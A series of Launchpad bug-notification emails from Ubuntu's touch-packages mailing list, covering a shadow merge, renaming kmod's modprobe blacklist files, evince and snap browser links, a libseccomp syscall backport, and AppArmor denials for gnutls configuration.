https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1951161] Re: Please merge shadow 1:4.8.1-2 (main) from Debian unstable
I think the changelog entry should still list the private home dirs change for login.defs under Remaining changes -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1951161 Title: Please merge shadow 1:4.8.1-2 (main) from Debian unstable Status in shadow package in Ubuntu: Confirmed Bug description: This merge is necessary because there are changes present in Ubuntu that are not present in Debian. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1951161/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1949316] [NEW] kmod modprobe.d scripts are named with non-inclusive language
Public bug reported: The kmod package ships with a number of files in /etc/modprobe.d which have non-inclusive names: $ dpkg -L kmod | grep blacklist /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf These should be renamed using the term denylist instead. Similarly, they should accept the term `denylist` rather than `blacklist` to specify modules that should not be loaded / aliases that should be ignored etc. ** Affects: kmod (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to kmod in Ubuntu. https://bugs.launchpad.net/bugs/1949316 Title: kmod modprobe.d scripts are named with non-inclusive language Status in kmod package in Ubuntu: New Bug description: The kmod package ships with a number of files in /etc/modprobe.d which have non-inclusive names: $ dpkg -L kmod | grep blacklist /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf These should be renamed using the term denylist instead. Similarly, they should accept the term `denylist` rather than `blacklist` to specify modules that should not be loaded / aliases that should be ignored etc. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/kmod/+bug/1949316/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
Is there any option to do this via portals - ie can evince use https://flatpak.github.io/xdg-desktop-portal/portal-docs.html#gdbus- org.freedesktop.portal.OpenURI to open the URI? Would then this allow to avoid going via xdg-open? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in apparmor package in Ubuntu: Confirmed Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago) modified.conffile..etc.apparmor.d.abstractions.evince: [modified] mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1794064/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1944436] Re: Please backport support for "close_range" syscall
Can you please post a simple reproducer? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libseccomp in Ubuntu. https://bugs.launchpad.net/bugs/1944436 Title: Please backport support for "close_range" syscall Status in libseccomp package in Ubuntu: New Bug description: Please backport support for the "close_range" syscall .. may be as simple as cherrypicking https://github.com/seccomp/libseccomp/commit/01e5750e7c84bb14e5a5410c924bed519209db06 from upstream. I've hit problems running buildah in a systemd-nspawn container, but this will probably affect people trying to run modern code in other container systems as well, e.g. docker. ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: libseccomp2 2.5.1-1ubuntu1~20.04.1 ProcVersionSignature: Ubuntu 5.4.0-84.94-generic 5.4.133 Uname: Linux 5.4.0-84-generic x86_64 ApportVersion: 2.20.11-0ubuntu27.20 Architecture: amd64 CasperMD5CheckResult: skip CurrentDesktop: Xpra Date: Tue Sep 21 15:10:54 2021 InstallationDate: Installed on 2017-01-08 (1717 days ago) InstallationMedia: Xubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: libseccomp UpgradeStatus: Upgraded to focal on 2021-09-02 (19 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1944436/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1938938] Re: apparmor denials for gnutls configuration
Hmm there is also a crypto abstraction too https://gitlab.com/apparmor/apparmor/-/blob/master/profiles/apparmor.d/abstractions/crypto - and this is included in the base abstraction so perhaps this *might* be another candidate..? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1938938 Title: apparmor denials for gnutls configuration Status in apparmor package in Ubuntu: New Bug description: gnutls library can be configured using /etc/gnutls/config for example to allow small keys and TLS versions below v1.2 however, if application is confined and has an apparmor profile and uses gnutls it will ignore such file, if it is not allowed to read it. For example: [ 382.586297] audit: type=1400 audit(1628068663.214:162): apparmor="DENIED" operation="open" profile="msmtp" name="/etc/gnutls/config" pid=18621 comm="sendmail" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [25379.358122] audit: type=1400 audit(1628093660.328:163): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/etc/gnutls/config" pid=53262 comm="evince" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [25460.754092] audit: type=1400 audit(1628093741.726:164): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/gnutls/config" pid=53347 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0 How can we allow to read /etc/gnutls/config for all apps that use gnutls? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1938938/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1938938] Re: apparmor denials for gnutls configuration
We already have an abstraction (ie a policy fragment) for openssl - https://gitlab.com/apparmor/apparmor/-/blob/master/profiles/apparmor.d/abstractions/openssl - perhaps a similar one should be created for gnutls and then this can be #include'd into the profiles for the various applications that wish to use gnutls. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/1938938 Title: apparmor denials for gnutls configuration Status in apparmor package in Ubuntu: New Bug description: gnutls library can be configured using /etc/gnutls/config for example to allow small keys and TLS versions below v1.2 however, if application is confined and has an apparmor profile and uses gnutls it will ignore such file, if it is not allowed to read it. For example: [ 382.586297] audit: type=1400 audit(1628068663.214:162): apparmor="DENIED" operation="open" profile="msmtp" name="/etc/gnutls/config" pid=18621 comm="sendmail" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [25379.358122] audit: type=1400 audit(1628093660.328:163): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/etc/gnutls/config" pid=53262 comm="evince" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [25460.754092] audit: type=1400 audit(1628093741.726:164): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/etc/gnutls/config" pid=53347 comm="dbus" requested_mask="r" denied_mask="r" fsuid=7 ouid=0 How can we allow to read /etc/gnutls/config for all apps that use gnutls? To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1938938/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp